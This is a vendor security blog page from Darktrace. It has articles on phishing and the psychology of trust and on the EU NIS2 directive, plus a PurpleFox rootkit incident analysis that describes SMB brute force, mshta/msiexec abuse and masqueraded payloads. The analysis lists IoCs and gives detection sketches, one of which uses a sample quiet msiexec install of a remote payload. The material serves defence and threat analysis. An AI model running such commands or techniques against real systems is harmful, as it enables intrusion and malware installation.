Email Security and the Psychology of Trust: Why Users Face a Losing Game of “Spot the Fake”
When security teams discuss the possibility of phishing attacks targeting their organization, the first reaction is often to assume compromise is inevitable because of the users. Users are typically cast in cyber security conversations as an organization's greatest weakness, cited as the cause of many grave cyber-attacks because they click links, open attachments, or approve multi-factor authentication requests without verifying their purpose.
While for many the weakness of the user may feel like fact rather than theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness training. The psychology of trust and the nature of human reliance on technology make preparing users for the exploitation of that trust very difficult – if not impossible.
This Darktrace long read will highlight principles of psychological and sociological research on the nature of trust, the elements of trust that relate to technology, and how the human brain is wired to rely on implicit trust. These principles all point to the same outcome: humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to that challenge.
What is the psychology of trust?
Psychological and sociological theories on trust largely centre on the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impact of trust decisions on interpersonal relationships, and the characteristics that make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability [1].
Most behavioural evaluations of trust decisions survey why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust must be seen in the wider context that trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts that require the brain to categorize information and assess possible dangers. More broadly, successful trust relationships are essential to maintaining the fabric of human society and critical to every element of human life.
Trust has been compared to dark matter (Rotenberg, 2018): the pervasive but difficult-to-observe material that holds galaxies together. In the same way, trust is an integral but often silent component of human life, connecting people and enabling social functioning [2].
Defining implicit and routine trust
As briefly mentioned earlier, dependence is an essential element of a trusting relationship. Over time, trust becomes a routine built on maintenance rather than establishment, and so becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust that friend anew with each new experience.
Active and passive levels of cognition are important to recognize in decision-making, including trust choices. Decision-making is often an active cognitive process requiring considerable resources from the brain. Many decisions, however, occur passively, especially when they are not new choices, e.g. habits or routines. The brain's focus turns to immediate tasks while relegating habitual choices to subconscious thought processes – passive cognition. Passive cognition leaves the brain open to inattentional blindness, wherein an individual may be abstractly aware of a choice that is neither the focus of their thought processes nor actively acknowledged as a decision. These levels of cognition are usually discussed as "attention" in research on cognition and processing [3].
This is essentially a concept of implicit trust: trust that occurs as a background thought process rather than as active decision-making. Implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choices and lifestyle. Combined with dependence on people and services, implicit trust creates a haze of cognition in which trust is implied and assumed, rather than actively chosen, across a myriad of scenarios.
Trust and technology
As researchers at the University of Cambridge highlight in their research into trust and technology, "In a fundamental sense, all technology depends on trust" [4]. The same implicit trust systems that allow us to navigate social interactions by subconsciously choosing to trust also govern our interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.
Most people have a favourite brand of soda. People will routinely purchase that soda and drink it without testing it for chemicals or bacteria, and without reading reviews to ensure the producer has not changed its quality standards. This is a representative example of routine trust: the trust choice is implicit through habitual action, and the person is not actively weighing the ramifications of continuing to use and trust the product.
The principle of dependence is especially important in discussions of trust and technology because the modern human is entirely reliant on technology and so has no way to avoid trusting it [5]. This is especially true in workplace scenarios: employees are given a mandatory set of technologies, from programs to devices and services, which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between user and technology. The key difference between interpersonal trust and technological trust is that deception is often much harder to identify in the latter.
The implicit trust in workplace technology
To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. The organizations also rely on the employees (users) to use those technologies within the accepted policies and operational guidelines. The employees rely on the organization to determine which products and services are safe or unsafe.
Within this context, implicit trust operates at every layer of the organization and its technological holdings, yet the trust choice is often made only annually by a small security team rather than continually re-evaluated. Systems and programs remain in place for years and are used because "that's the way it's always been done." Against that backdrop, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult for a human to identify.
For example, many organizations use email to notify employees of software updates. Typically, such an email prompts employees to update to new versions directly from the vendor or from public marketplaces, such as the App Store on Mac or the Microsoft Store on Windows. If that kind of email were impersonated – spoofing an update and including a malicious link or attachment – there would be no reason for the employee to question it, given the implicit trust reinforced through habitual use of that service and program.
Inattentional blindness: How the brain ignores change
Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices made subconsciously. Changes to these technologies are often subject to inattentional blindness: a psychological phenomenon wherein the brain overwrites sensory information with what it expects to see rather than what is actually perceived.
A famous demonstration of inattentional blindness [6] is an experiment that asks individuals to count the number of times a ball is passed between several people. While that is occurring, something else happens in the background which, statistically, most participants will not see. The shock comes afterwards, when the researcher reveals that the unseen background event was a person in a gorilla suit walking back and forth through the group. The experiment highlights how significant details can be overlooked by the brain and "overwritten" with other sensory information. Applied to technology, inattentional blindness and implicit trust make changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans to detect.
With all this in mind, how can you prepare users to correctly anticipate or identify a violation of trust when their brains subconsciously make trust decisions and unintentionally ignore the cues that suggest a change in behaviour? The short answer: it is difficult, if not impossible.
How threats exploit our implicit trust in technology
Most cyber threats are built around exploiting the implicit trust humans place in technology. Whether through techniques like "living off the land", wherein programs normally associated with expected activity are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns and scams, many cyber threats are predicated on the exploitation of human trust rather than simply evading technological safeguards or building backdoors into programs.
In the case of phishing, the attempts to leverage users' trust in technology and services are easy to identify. The most common example is spoofing, one of the tactics most frequently observed by Darktrace/Email. Spoofing mimics a trusted user or service and can be accomplished through a variety of mechanisms, be it the creation of a fake domain meant to mirror a trusted link, or of an email account that appears to belong to a Human Resources, Internal Technology, or Security service.
In the case of a falsified internal service, often dubbed a "Fake Support Spoof", the user is exploited into following instructions from what appears to be an accepted organizational authority and service provider, whose instructions would normally be followed. These cases are often difficult to spot from the sender's address or the text of the email alone, and become even harder to detect if an account belonging to one of those services is compromised, so that the sender's address is legitimate and expected for correspondence. Given the context of implicit trust, detecting deception in these cases is extremely difficult.
How email security solutions can solve the problem of implicit trust
How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is email security that leverages behavioural analysis via anomaly detection, rather than traditional email gateways.
Expecting humans to identify the exploitation of their own trust is a high-risk, low-reward endeavour, especially when that exploitation takes different forms, affects different users or parts of the organization differently, and does not always carry obvious red flags. Enter email security using anomaly detection as the key answer to this evolving problem.
Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams, enabling the identification of departures from the norm, even those designed to mimic expected activity. Anomaly detection mitigates the human cognitive biases that might prevent teams from identifying evolving threats. It may alert security teams to benign anomalous activity, but it ensures that no threat, however novel or cleverly packaged, goes unidentified and unreported to the human security team.
Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision-making while identifying patterns and categorizing information without the framing and biases that allow trust to be leveraged and exploited.
For example, say a cleverly written email arrives from an address that appears to belong to a Microsoft affiliate, suggesting the user patch their software due to a newly discovered vulnerability. The sender's address appears legitimate, and news stories are circulating on major media outlets about a new Microsoft vulnerability causing organizations serious problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download and takes only a few minutes to install. Whether this email was generated by a service like ChatGPT (generative AI) or written by a person, acting on it would hand the threat actor(s) the user's username and password, and downloading the software would activate malware on the device and potentially the broader network.
If we rely on users to identify this as unusual, plenty of evidence points reinforce their implicit trust in Microsoft services and incline them to comply with the email rather than question it. Anomaly detection-driven email security, by comparison, would flag the unusual source: the mail would likely not come from a Microsoft-owned IP address, and the sender would be rare for an organization that does not normally receive mail from them. The language might indicate solicitation – an attempt to entice the user to act – and the link could be flagged for containing a hidden redirect or tailored information the user cannot see, whether hidden beneath text like "Click Here" or behind link shortening. All of this information is present and discoverable in the phishing email, but often invisible to human users because of trust decisions made months or even years ago about known products and services.
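To make that concrete, the sketch below shows the shape of such reasoning in code. It is purely illustrative: the field names, weights, and threshold are hypothetical inventions for this example, not Darktrace's models, which learn what is normal for each organization rather than applying fixed rules.

```python
# A minimal, illustrative sketch of anomaly-style email scoring. All field
# names, weights, and thresholds are hypothetical; this is not Darktrace's
# actual model, which learns per-organization norms.

def anomaly_score(email: dict, known_senders: set) -> float:
    score = 0.0
    # Rare sender: the organization has no history with this domain.
    if email["sender_domain"] not in known_senders:
        score += 0.4
    # Source mismatch: claims a brand but comes from unrelated infrastructure.
    if email["claims_brand"] and not email["ip_matches_brand"]:
        score += 0.3
    # Link opacity: display text hides the true destination.
    if any(l["text"] != l["target_domain"] for l in email["links"]):
        score += 0.2
    # Solicitation: language urging immediate action.
    if email["urgent_language"]:
        score += 0.1
    return score

email = {
    "sender_domain": "rnicrosoft-updates.example",  # hypothetical lookalike
    "claims_brand": "Microsoft",
    "ip_matches_brand": False,
    "links": [{"text": "Click Here", "target_domain": "bit.ly"}],
    "urgent_language": True,
}
print(anomaly_score(email, known_senders={"partner.example"}))  # 1.0
```

Every one of these signals is present in the example email above; what the sketch cannot capture is that a learned baseline, rather than fixed rules, is what lets anomaly detection keep working as attackers change their templates.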
AI-driven Email Security: The Way Forward
Email security solutions employing anomaly detection are critical weapons in security teams' fight to stay ahead of evolving threats and varied kill chains, which grow more complex year on year. The intertwining nature of technology, coupled with society's massive reliance on it, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues into an organization. The changes to phishing and social engineering made possible by generative AI are just a drop in the ocean of threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate attacks that target users and technologies by exploiting trust.
References
[1] https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx
[2] Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.
[3] https://www.cognifit.com/gb/attention
[4] https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common
[5] Tyler, T.R. and Kramer, R.M. (2001). Trust in Organizations: Frontiers of Theory and Research. Thousand Oaks, CA: Sage Publications, pp. 39–49.
[6] https://link.springer.com/article/10.1007/s00426-006-0072-4
More in this series
The Implications of NIS2 on Cyber Security and AI
The NIS2 Directive requires member states to adopt laws that will improve the cyber resilience of organizations within the EU. It applies to organizations that are "operators of essential services". Under NIS1, EU member states could decide for themselves what this meant; in an effort to ensure more consistent application, NIS2 sets out its own definition. It eliminates NIS1's distinction between operators of essential services and digital service providers, instead defining a new list of sectors:
- Energy (electricity, district heating and cooling, gas, oil, hydrogen)
- Transport (air, rail, water, road)
- Banking (credit institutions)
- Financial market infrastructures
- Health (healthcare providers and pharma companies)
- Drinking water (suppliers and distributors)
- Digital infrastructure (DNS, TLD registries, telcos, data center providers, etc.)
- ICT service providers (B2B): MSSPs and managed service providers
- Public administration (central and regional government institutions, as defined per member state)
- Space
- Postal and courier services
- Waste management
- Chemicals
- Food
- Manufacturing of medical devices
- Computers and electronics
- Machinery and equipment
- Motor vehicles, trailers and semi-trailers and other transport equipment
- Digital providers (online market places, online search engines, and social networking service platforms) and research organizations.
With these updates, it becomes hard to find an industry segment not included within the scope. NIS2 represents legally binding cyber security requirements for a significant region and economy. The standout feature that has garnered the most attention is the tight timeline attached to notification requirements: under NIS2, in-scope entities must submit an initial report or "early warning" to the competent national authority or computer security incident response team (CSIRT) within 24 hours of becoming aware of a significant incident. This is a new development from the first iteration of the Directive, which used the vaguer language of notifying authorities "without undue delay".
Another aspect gaining attention is oversight and regulation: regulators will be empowered with significant investigation and supervision powers, including on-site inspections. We cover more on this in our white paper.
The stakes are now higher, with the prospect of fines of up to €10 million or 2% of an offending organization's annual worldwide turnover – whichever is greater. Added to that, the NIS2 Directive places an explicit obligation on members of management bodies to ensure compliance with NIS2 obligations – and members can be held personally liable for breaches of those duties.
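For a concrete sense of scale, the "whichever is greater" rule is easy to express; a trivial sketch using only the figures quoted above:

```python
def nis2_max_fine(annual_worldwide_turnover_eur: float) -> float:
    """Maximum fine under the rule described above: EUR 10 million or
    2% of annual worldwide turnover, whichever is greater."""
    return max(10_000_000, 0.02 * annual_worldwide_turnover_eur)

# A company with EUR 2bn turnover faces a cap of EUR 40m, not EUR 10m.
print(nis2_max_fine(2_000_000_000))  # 40000000.0
```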
The risk management measures introduced in the Directive are not altogether surprising – they reflect common best practices. Many organizations (especially those that are newly in scope for NIS2) may have to expand their cyber security capabilities, but there’s nothing controversial or alarming in the required measures. For organizations in this situation, there are various tools, best practices, and frameworks they can leverage. Darktrace in particular provides capabilities in the areas of visibility, incident handling, and reporting that can help.
NIS2 and Cyber AI
The use of AI is not an outright requirement within NIS2 – which may be down to a lack of knowledge and expertise in the area, and/or the immaturity of the sector. The clue might be in the timing: the provisional agreement on the NIS2 text was reached in May 2022, six months before ChatGPT and a wave of other generative AI tools propelled AI technology to the forefront of public consciousness. If the language were drafted today, it is not far-fetched to imagine AI being mentioned much more prominently, perhaps even as a requirement.
NIS2 does, however, very clearly recommend that “member states should encourage the use of any innovative technology, including artificial intelligence”[1]. Another section speaks directly to essential and important entities, saying that they should “evaluate their own cyber security capabilities, and where appropriate, pursue the integration of cyber security enhancing technologies, such as artificial intelligence or machine learning systems…”[2]
One of the recitals states that "member states should adopt policies on the promotion of active cyber protection", where active cyber protection is defined as "the prevention, detection, monitoring, analysis and mitigation of network security breaches in an active manner" [3].
From a Darktrace perspective, self-learning Cyber AI is precisely what enables our technology to deliver active cyber protection – protecting organizations and uplifting security teams at every stage of the incident lifecycle, from proactively hardening defenses before an attack is launched, to real-time threat detection and response, through to recovering quickly back to a state of good health.
The visibility provided by Darktrace is vital to understanding the effectiveness of policies and ensuring policy compliance. NIS2 also covers incident handling and business continuity, which Darktrace HEAL addresses through AI-enabled incident response, readiness reports, simulations, and secure collaborations.
Reporting is integral to NIS2 and organizations can leverage Darktrace’s incident reporting features to present the necessary technical details of an incident and provide a jump start to compiling a full report with business context and impact.
What’s Next for NIS2
We don't yet know the details of how EU member states will transpose NIS2 into national law – they have until 17 October 2024 to work this out. The Commission has also committed to reviewing the functioning of the Directive every three years. Given how quickly our understanding of both the dangers and the power of AI (perhaps even its necessity in the realm of cyber security) is changing, we may see many member states leverage the recitals' references to AI to make a strong push – if not a requirement – for essential and important organizations within their jurisdiction to adopt AI.
Organizations are starting to prepare now to meet the forthcoming legislation related to NIS2. To see how Darktrace can help, talk to your representative or contact us.
[1] Recital (51), p. 11
[2] Recital (89), p. 17
[3] Recital (57), p. 12

PurpleFox in a Henhouse: How Darktrace Hunted Down a Persistent and Dynamic Rootkit
Versatile Malware: PurpleFox
As organizations and security teams across the world move to bolster their digital defenses against cyber threats, threat actors, in turn, are forced to adopt more sophisticated tactics, techniques and procedures (TTPs) to circumvent them. Rather than being static and predictable, malware strains are becoming increasingly versatile and therefore elusive to traditional security tools.
One such example is PurpleFox. First observed in 2018, PurpleFox is a combined fileless rootkit and backdoor trojan known to target Windows machines. It consistently adapts its functionality over time, utilizing infection vectors including known vulnerabilities (CVEs), fake Telegram installers, and phishing. It has also been leveraged by other campaigns to deliver ransomware, spyware, and cryptocurrency-mining malware, and is widely known for using Microsoft Software Installer (MSI) files masquerading as other file types.
The Evolution of PurpleFox
The Original Strain
First reported in March 2018, PurpleFox was identified as a trojan that drops itself onto Windows machines using an MSI installation package that alters registry values to replace a legitimate Windows system file [1]. The initial stage of infection relied on a third-party toolkit, the RIG Exploit Kit (EK). RIG EK is hosted on compromised or malicious websites and is dropped onto the unsuspecting system when a user browses that site. The built-in Windows installer (MSIEXEC) is leveraged to run the installation package retrieved from the website. This, in turn, drops two files into the Windows directory: a malicious dynamic-link library (DLL) that acts as a loader, and the payload of the malware. After infection, PurpleFox is often used to retrieve and deploy other types of malware.
Subsequent Variants
Since its initial discovery, PurpleFox has also been observed leveraging PowerShell to enable fileless infection, and abusing additional privilege escalation vulnerabilities to increase the likelihood of successful infection [2]. The PowerShell script has been reported to masquerade as a .jpg image file. PowerSploit modules are used to gain elevated privileges if the current user lacks administrator rights; once obtained, the script retrieves and executes a malicious MSI package, also masquerading as an image file. As of 2020, PurpleFox no longer relied on RIG EK for its delivery phase, instead spreading via exploitation of the SMB protocol [3]. The malware leverages compromised systems as hosts for PurpleFox payloads, facilitating its spread to other systems. This mode of infection can occur without any user action, akin to a worm.
The current iteration of PurpleFox reportedly brute-forces vulnerable services, such as SMB, to spread over the network and escalate privileges. By scanning internet-facing Windows computers, PurpleFox exploits weak passwords for Windows user accounts over SMB, including administrative credentials, to facilitate further privilege escalation.
Darktrace detection of PurpleFox
In July 2023, Darktrace observed a PurpleFox infection on the network of a customer in the healthcare sector, featuring a slightly different method of downloading the PurpleFox payload. An affected device was observed initiating a series of service control requests over DCE-RPC, instructing target devices to connect to a series of servers and download a malicious .PNG file, later confirmed to be the PurpleFox rootkit. The device was then observed carrying out worm-like activity against other external internet-facing servers, as well as scanning related subnets.
Darktrace DETECT™ successfully identified and tracked this compromise across the cyber kill chain, enabling the customer to take swift remedial action and prevent the attack from escalating further.
While the customer in question did have Darktrace RESPOND™, it was configured in human confirmation mode, meaning any mitigative actions had to be manually applied by the customer's security team. Had RESPOND been enabled in autonomous response mode at the time of the attack, it would have taken swift action to contain the compromise at the earliest instance.
Attack Overview
Initial Scanning over SMB
On July 14, 2023, Darktrace detected the affected device scanning other internal devices on the customer's network via port 445. The numerous connections were consistent with the worm-like activity reported in previous PurpleFox campaigns, targeting SMB services in search of open or vulnerable channels to exploit.
This initial scanning activity was detected by Darktrace DETECT, specifically through the model breach 'Device / Suspicious SMB Scanning Activity'. Darktrace's Cyber AI Analyst™ then launched an autonomous investigation into these internal connections, tying them together into one larger network reconnaissance incident rather than treating them as a series of isolated connections.
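For intuition only (this is not a description of Darktrace's model logic), a simple heuristic for this class of activity might count how many distinct internal hosts a single device contacts on port 445 within a short window; the threshold and window below are hypothetical:

```python
# Illustrative sliding-window heuristic for SMB scanning. Threshold and
# window values are hypothetical, not Darktrace's learned baselines.
from collections import defaultdict, deque
from datetime import timedelta

WINDOW = timedelta(minutes=5)
THRESHOLD = 50  # distinct peers contacted on port 445

def detect_smb_scanners(connections):
    """connections: iterable of (timestamp, src_ip, dst_ip, dst_port)
    tuples, sorted by timestamp. Yields (src_ip, timestamp) when a
    source first reaches the distinct-peer threshold within the window."""
    recent = defaultdict(deque)  # src_ip -> deque of (timestamp, dst_ip)
    for ts, src, dst, port in connections:
        if port != 445:
            continue
        peers = recent[src]
        peers.append((ts, dst))
        # Drop events that have aged out of the sliding window.
        while peers and ts - peers[0][0] > WINDOW:
            peers.popleft()
        if len({d for _, d in peers}) == THRESHOLD:
            yield src, ts
```

A fixed rule like this generates noise on busy file servers; the point of a learned baseline is that the threshold is effectively different for every device.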
As Darktrace RESPOND was configured in human confirmation mode, it was unable to autonomously block these internal connections. However, it did suggest blocking connections on port 445, which could have been manually applied by the customer’s security team.
Privilege Escalation
The device successfully logged in via NTLM with the credential 'administrator'. Darktrace recognized that the endpoint was external to the customer's environment, indicating that the affected device was now being used to propagate the malware to other networks. Given the lack of observed brute-force activity up to this point, the 'administrator' credentials had likely been compromised prior to Darktrace's deployment on the network, or outside of Darktrace's purview via a phishing attack.
Exploitation
Darktrace then detected a series of service control requests over DCE-RPC using the credential 'admin' to issue SVCCTL CreateServiceW requests. A script was then observed in which the controlled device was instructed to launch mshta.exe, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. This enables the execution of arbitrary script code – VBScript, in this case.
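This step also leaves a recognizable trace in network telemetry. As a hedged sketch: on a network monitored with a tool like Zeek, remote service creation typically surfaces in dce_rpc.log as a CreateServiceW operation against the svcctl endpoint. The field names below follow Zeek's flattened JSON output and should be verified against your own deployment:

```python
import json

def remote_service_creations(log_path: str):
    """Yield DCE-RPC events matching the SVCCTL CreateServiceW pattern
    described above, from a Zeek dce_rpc.log in JSON format."""
    with open(log_path) as f:
        for line in f:
            event = json.loads(line)
            if (event.get("endpoint") == "svcctl"
                    and event.get("operation") == "CreateServiceW"):
                yield event["id.orig_h"], event["id.resp_h"], event["ts"]

for src, dst, ts in remote_service_creations("dce_rpc.log"):
    print(f"{ts}: {src} created a service on {dst} via SVCCTL")
```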
There are a few MSIEXEC flags to note:
- /i : installs or configures a product
- /Q : sets the user interface level. In this case, it is set to ‘No UI’, which is used for “quiet” execution, so no user interaction is required
Evidently, this was an attempt to evade detection, with the package surreptitiously installed onto the system without alerting the endpoint user. This corresponds to the download of the rootkit previously associated with PurpleFox. At this stage, the infected device continued to be leveraged as an attack device, scanning SMB services across external endpoints. The device also appeared to attempt brute-forcing over NTLM against these endpoints using the same 'administrator' credential. This activity was identified by Darktrace DETECT; had RESPOND been enabled in autonomous response mode, it would have instantly blocked similar outbound connections, preventing the spread of PurpleFox.
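The combination described above – a remote package passed to /i and executed quietly with /Q – is itself a useful hunting signal. A minimal sketch of such a check over collected process command lines (the pattern and the sample command line are illustrative, not the exact PurpleFox invocation):

```python
import re

# Flags msiexec invocations that quietly install a package fetched over
# HTTP(S) -- the /i + /Q combination described above. Illustrative only;
# the sample IP below is from the documentation range, not a real IoC.
QUIET_REMOTE_MSI = re.compile(
    r"msiexec(\.exe)?\s+(?=.*/i\s+https?://)(?=.*/q)", re.IGNORECASE
)

def is_suspicious_msiexec(cmdline: str) -> bool:
    return bool(QUIET_REMOTE_MSI.search(cmdline))

print(is_suspicious_msiexec(
    "msiexec /i http://198.51.100.7:12345/payload.msi /Q"
))  # True
```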
Installation
On August 9, Darktrace observed the device making initial attempts to download a malicious .PNG file. This was a notable change in tactics from previously reported PurpleFox campaigns, which had utilized .MOE files for their payloads [3]. The .MOE payloads are binary files that are more easily detected and blocked by traditional signature-based security measures, as they are not associated with known software. The ubiquity of .PNG files, especially on the web, makes identifying and blacklisting the files significantly more difficult.
The first connection was made with the URI '/test.png'. Notably, the HTTP method here was HEAD, a method similar to GET except that the server must not return a message body in the response.
The metainformation contained in the HTTP headers in response to a HEAD request should be identical to the information sent in response to a GET request. This method is often used to test hypertext links for validity and recent modification, and here likely served to check whether the server hosting the payload was still active. Avoiding connections that could be detected by antivirus solutions helps keep this activity under the radar.
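The behaviour of HEAD is easy to demonstrate with a few lines of Python: the request returns the same headers a GET would, but no body (the URL here is a placeholder, not a real PurpleFox endpoint):

```python
import requests

# HEAD returns the same headers a GET would, with no message body --
# a cheap way to confirm a file is still being served. Placeholder URL.
resp = requests.head("https://example.com/test.png", allow_redirects=False)
print(resp.status_code)                  # e.g. 200 if the resource is live
print(resp.headers.get("Content-Type"))  # metadata arrives as usual
print(len(resp.content))                 # 0 -- no body is returned
```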
The server responded with a status code of 200 before the download began. The HEAD request was likely part of the attacker's verification that the server was still running and the payload available for download. The '/test.png' HEAD request was sent twice, likely as double confirmation before beginning the file transfer.
Subsequent packet capture (PCAP) analysis revealed that this connection used the Windows Installer user agent previously associated with PurpleFox. The device then began to download a payload masquerading as a Microsoft Word document, ultimately downloading the payload twice from two separate endpoints.
By masquerading the file as a Microsoft Word document, the threat actor was likely attempting to evade detection by the endpoint user and traditional security tools, passing the payload off as an innocuous text document. Likewise, using a Windows Installer user agent would help threat actors bypass antivirus measures and disguise the malicious installation as legitimate download activity.
Darktrace DETECT identified these as masqueraded file downloads by recognizing the mismatch between the file extension and the true file type. Subsequently, AI Analyst correctly identified the file type and deduced that the download was indicative of the device having been compromised.
In this case, the device attempted to download the payload from several different endpoints, many of which had low antivirus detection rates or few open-source intelligence (OSINT) flags, highlighting the need to move beyond traditional signature-based detections.
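A simplified version of that mismatch check can be expressed by comparing a file's claimed extension against its leading "magic" bytes. The signatures below are standard; the logic is a sketch, not Darktrace's implementation:

```python
# Maps leading "magic" bytes to the true file type. The signatures are
# standard; the mismatch logic is a simplified, illustrative sketch.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "msi/ole",  # MSI uses the OLE compound format
    b"PK\x03\x04": "zip/docx",  # modern Word documents are ZIP containers
    b"MZ": "exe/dll",
}

def true_type(path: str) -> str:
    """Identify a file by its leading bytes rather than its name."""
    with open(path, "rb") as f:
        head = f.read(8)
    for sig, ftype in MAGIC.items():
        if head.startswith(sig):
            return ftype
    return "unknown"

def extension_mismatch(path: str) -> bool:
    """True when the claimed extension disagrees with the detected type."""
    ext = path.rsplit(".", 1)[-1].lower()
    detected = true_type(path)
    return detected != "unknown" and ext not in detected

# A payload named report.docx whose bytes carry the OLE or PNG signature
# would be flagged here as a masqueraded file.
```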
Had Darktrace RESPOND been enabled in autonomous response mode at the time of the attack, it would have blocked connections to these suspicious endpoints, preventing the download of malicious files. However, as RESPOND was in human confirmation mode, its actions required manual application by the customer's security team; unfortunately this did not happen, and the device was able to download the payloads.
Conclusion
The PurpleFox malware is a particularly dynamic strain, known to continually evolve and to blend old and new approaches in ways likely to muddy expectations of its behavior. By frequently employing new methods of attack, malicious actors are able to bypass traditional security tools that rely on signature-based detections and static lists of indicators of compromise (IoCs), necessitating a more sophisticated approach to threat detection.
Darktrace DETECT’s Self-Learning AI enables it to confront adaptable and elusive threats like PurpleFox. By learning and understanding customer networks, it is able to discern normal network behavior and patterns of life, distinguishing expected activity from potential deviations. This anomaly-based approach to threat detection allows Darktrace to detect cyber threats as soon as they emerge.
By combining DETECT with the autonomous response capabilities of RESPOND, Darktrace customers are able to effectively safeguard their digital environments and ensure that emerging threats can be identified and shut down at the earliest stage of the kill chain, regardless of the tactics employed by would-be attackers.
Credit to Piramol Krishnan, Cyber Analyst, Qing Hong Kwa, Senior Cyber Analyst & Deputy Team Lead, Singapore
Appendices
Darktrace Model Detections
- Device / Increased External Connectivity
- Device / Large Number of Connections to New Endpoints
- Device / SMB Session Brute Force (Admin)
- Compliance / External Windows Communications
- Anomalous Connection / New or Uncommon Service Control
- Compromise / Unusual SVCCTL Activity
- Compromise / Rare Domain Pointing to Internal IP
- Anomalous File / Masqueraded File Transfer
RESPOND Models
- Antigena / Network / Significant Anomaly / Antigena Breaches Over Time Block
- Antigena / Network / External Threat / Antigena Suspicious Activity Block
- Antigena / Network / Significant Anomaly / Antigena Significant Anomaly from Client Block
- Antigena / Network / Significant Anomaly / Antigena Enhanced Monitoring from Client Block
- Antigena / Network / External Threat / Antigena Suspicious File Block
- Antigena / Network / External Threat / Antigena File then New Outbound Block
List of IoCs
IoC - Type - Description
/C558B828.Png - URI - URI for Purple Fox Rootkit [4]
5b1de649f2bc4eb08f1d83f7ea052de5b8fe141f - File Hash - SHA1 hash of C558B828.Png file (Malware payload)
190.4.210[.]242 - IP - Purple Fox C2 Servers
218.4.170[.]236 - IP - IP for download of .PNG file (Malware payload)
180.169.1[.]220 - IP - IP for download of .PNG file (Malware payload)
103.94.108[.]114:10837 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
221.199.171[.]174:16543 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
61.222.155[.]49:14098 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
178.128.103[.]246:17880 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
222.134.99[.]132:12539 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
164.90.152[.]252:18075 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
198.199.80[.]121:11490 - IP - IP from Service Control MSIEXEC script to download PNG file (Malware payload)
MITRE ATT&CK Mapping
Tactic - Technique
Reconnaissance - Active Scanning T1595, Active Scanning: Scanning IP Blocks T1595.001, Active Scanning: Vulnerability Scanning T1595.002
Resource Development - Obtain Capabilities: Malware T1588.001
Initial Access, Defense Evasion, Persistence, Privilege Escalation - Valid Accounts: Default Accounts T1078.001
Initial Access - Drive-by Compromise T1189
Defense Evasion - Masquerading T1036
Credential Access - Brute Force T1110
Discovery - Network Service Discovery T1046
Command and Control - Proxy: External Proxy T1090.002
References
- https://blog.360totalsecurity.com/en/purple-fox-trojan-burst-out-globally-and-infected-more-than-30000-users/
- https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
- https://www.akamai.com/blog/security/purple-fox-rootkit-now-propagates-as-a-worm
- https://www.foregenix.com/blog/an-overview-on-purple-fox
- https://www.trendmicro.com/en_sg/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html